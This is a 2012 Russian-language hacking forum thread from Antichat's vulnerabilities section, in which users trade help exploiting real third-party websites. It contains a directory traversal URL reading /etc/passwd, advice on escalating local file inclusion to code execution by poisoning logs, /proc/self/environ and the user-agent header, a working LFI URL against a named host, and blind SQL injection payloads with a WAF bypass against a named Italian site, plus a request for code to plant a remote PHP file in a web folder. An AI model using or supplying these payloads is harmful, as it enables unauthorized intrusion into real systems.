HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.09.2012, 18:33
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от kacergei  
Здравствуйте нашел Directory Traversal
http://site.ru/download.php?file=%2f..%2f..%2f..%2f..%2f..%2f..%2 f..%2f..%2f..%2f..%2fetc%2fpasswd - файл отлично выводиться, что делать дальше? Что можно из этого извлеч? Ранчше с этим не сталкивался
Вопервых можешь поискать логи ошибок, спровацировать ошибку вставив в нее свой пхп код и проинклудить, во вторых если проинклудидится такая херь /proc/self/environ, то можешь также в хидерах отправить запрос с уже твоим пхп кодом, например в название браузера.
 
Ответить с цитированием

  #2  
Старый 15.09.2012, 18:58
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906

Репутация: -5
По умолчанию

Цитата:
Сообщение от winstrool  
Вопервых можешь поискать логи ошибок, спровацировать ошибку вставив в нее свой пхп код и проинклудить, во вторых если проинклудидится такая херь /proc/self/environ, то можешь также в хидерах отправить запрос с уже твоим пхп кодом, например в название браузера.
/proc/self/environ не инклудится, какие есть еще варианты?

И Как найти логи ошибок? (напиши в личку аську)
 
Ответить с цитированием

  #3  
Старый 15.09.2012, 19:45
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

Цитата:
Сообщение от kacergei  
И Как найти логи ошибок?
Брутом по списку наиболее распространенных вариантов.

Если сайт на хостинге, читаешь инструкции и факи хостера или регаешь там же свой сайт, чтобы узнать стандартные имена лог-файлов.
 
Ответить с цитированием

  #4  
Старый 18.09.2012, 08:13
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от kacergei  
/proc/self/environ не инклудится, какие есть еще варианты?
И Как найти логи ошибок? (напиши в личку аську)
Тема for you - /thread324564.html.

Еще есть вариант с ftp логами.
 
Ответить с цитированием

  #5  
Старый 19.09.2012, 15:19
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Есть сайт LFI, логи Apache не нашел. Решил поискать в /proc. Вспомнил, что путь до логов знать не обязательно, а можно залится через символическую ссылку к этим самым логам, но надо знать идентификатор процесса и ярлык соответствующему файлу. Соответственно полез я в /proc/self/status:

Код:
Name: apache State: R (running) SleepAVG: 97% Tgid: 28857 Pid: 28857 PPid: 7349 TracerPid: 0 Uid: 65534 65534 65534 65534 Gid: 65534 65534 65534 65534 FDSize: 32 Groups: 65534 VmSize: 19128 kB VmLck: 0 kB VmRSS: 8676 kB VmData: 2440 kB VmStk: 84 kB VmExe: 488 kB VmLib: 13636 kB VmPTE: 24 kB Threads: 1 SigQ: 0/2048 SigPnd: 0000000000000000 ShdPnd: 0000000000000000 SigBlk: 0000000080000000 SigIgn: 0000000000001200 SigCgt: 00000003844064eb CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000
Вижу PID: 28857. Пытаюсь залится: http://ozrics.dyndns.info/modules/page.php?id=../../../proc/28857/fd/2&cmd=phpinfo();

В этот момент у меня уже стоит user-agent:

Что делаю не так?
 
Ответить с цитированием

  #6  
Старый 19.09.2012, 18:50
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Zed0x  
Есть сайт LFI, логи Apache не нашел. Решил поискать в /proc. Вспомнил, что путь до логов знать не обязательно, а можно залится через символическую ссылку к этим самым логам, но надо знать идентификатор процесса и ярлык соответствующему файлу. Соответственно полез я в /proc/self/status:
Код:
Name: apache State: R (running) SleepAVG: 97% Tgid: 28857 Pid: 28857 PPid: 7349 TracerPid: 0 Uid: 65534 65534 65534 65534 Gid: 65534 65534 65534 65534 FDSize: 32 Groups: 65534 VmSize: 19128 kB VmLck: 0 kB VmRSS: 8676 kB VmData: 2440 kB VmStk: 84 kB VmExe: 488 kB VmLib: 13636 kB VmPTE: 24 kB Threads: 1 SigQ: 0/2048 SigPnd: 0000000000000000 ShdPnd: 0000000000000000 SigBlk: 0000000080000000 SigIgn: 0000000000001200 SigCgt: 00000003844064eb CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000
Вижу PID: 28857. Пытаюсь залится: http://ozrics.dyndns.info/modules/page.php?id=../../../proc/28857/fd/2&cmd=phpinfo();
В этот момент у меня
уже
стоит user-agent:
Что делаю не так?
попробуй сначала вывести phpinfo() из user-agent минуя get переменную, возможно что-то напутал с PID.
 
Ответить с цитированием

  #7  
Старый 20.09.2012, 02:31
DeepXhadow
Познающий
Регистрация: 19.04.2008
Сообщений: 67
Провел на форуме:
596695

Репутация: 19
По умолчанию

помогите докрутить блинд скулю..

Цитата:
Сообщение от None  
www.informatoreagario.it/clickthrough.asp?IDbanner=-3681 OR (ascii(substring((system_user),1,1)) > 0)
сама уязвимость

написал скриптик (код позаимствовал из тэмпера) для версии и текучей БД:

MS SQL 2005 и база 'InformatoreAgrario'

терь хочу выбрать таблицы в текщей базе, но почему-то не получается =/

Цитата:
Сообщение от None  
-3681 OR (ascii(substring((SELECT count(name) FROM InformatoreAgrario..sysobjects),1,1)) > 0)
havji на эту багу вообще никак не реагирует, видимо работать с OR ее не научили
 
Ответить с цитированием

  #8  
Старый 20.09.2012, 07:58
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Pangolin PRO отлично справляется с MSSQL инъекциями.

Version = Microsoft SQL Server 2005 - 9.00.5000.00 (Intel X86) Dec 10 2010 10:56:29 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

User= webuser

Database = InformatoreAgrario

Но в твоём случае извлечению табличек мешает WAF.

[CODE]
http://www.informatoreagrario.it/clickthrough.asp?IDbanner=244%09and%09(select%09le n(cast(count(1)%09as%09varchar(10)))%09from%09[informatoreagrario]..[sysobjects]%09where%09xtype=char(85)%09and%09status>0)>88%09a nd%091
 
Ответить с цитированием

  #9  
Старый 20.09.2012, 14:22
blesse
Участник форума
Регистрация: 18.01.2012
Сообщений: 162
Провел на форуме:
29647

Репутация: 1
По умолчанию

Напишите плз пхп код который скачает файл с http://x/x.php и поместит его в

/var/www/htdocs/images/ ?
 
Ответить с цитированием

  #10  
Старый 20.09.2012, 14:30
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от blesse  
Напишите плз пхп код который скачает файл с http://x/x.php и поместит его в
/var/www/htdocs/images/ ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.